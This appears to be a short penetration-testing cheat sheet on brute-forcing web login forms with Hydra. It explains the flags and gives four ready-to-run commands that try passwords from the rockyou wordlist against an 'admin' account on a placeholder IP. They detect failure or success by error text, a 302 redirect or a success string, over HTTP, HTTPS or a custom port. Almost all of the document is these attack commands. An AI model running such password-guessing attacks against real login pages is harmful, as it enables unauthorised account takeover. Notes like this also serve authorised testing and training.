Brute-Force

<Path_To_Login_Form>:<Post_Data>:<Incorrect/Correct_String_Params>

# -l : username
# -P : password list
# http(s)-*-form : "<Path_To_Login_Form>:<Post_Data>:<Incorrect_String>
# -s : Specify a port 

# Find on error
hydra -l admin -P /usr/share/wordlists/rockyou.txt <IP> http-post-form "/login.php:user=^USER^&password=^PASS^:Login failed"
hydra -l admin -P /usr/share/wordlists/rockyou.txt -s 8080 <IP> http-post-form "/login.php:user=^USER^&password=^PASS^:Login failed"

# Find on success
hydra -l admin -P /usr/share/wordlists/rockyou.txt <IP> https-post-form "/login.php:user=^USER^&password=^PASS^:S=302"
hydra -l admin -P /usr/share/wordlists/rockyou.txt <IP> http-get-form "/login.php:user=^USER^&password=^PASS^:S=Success!"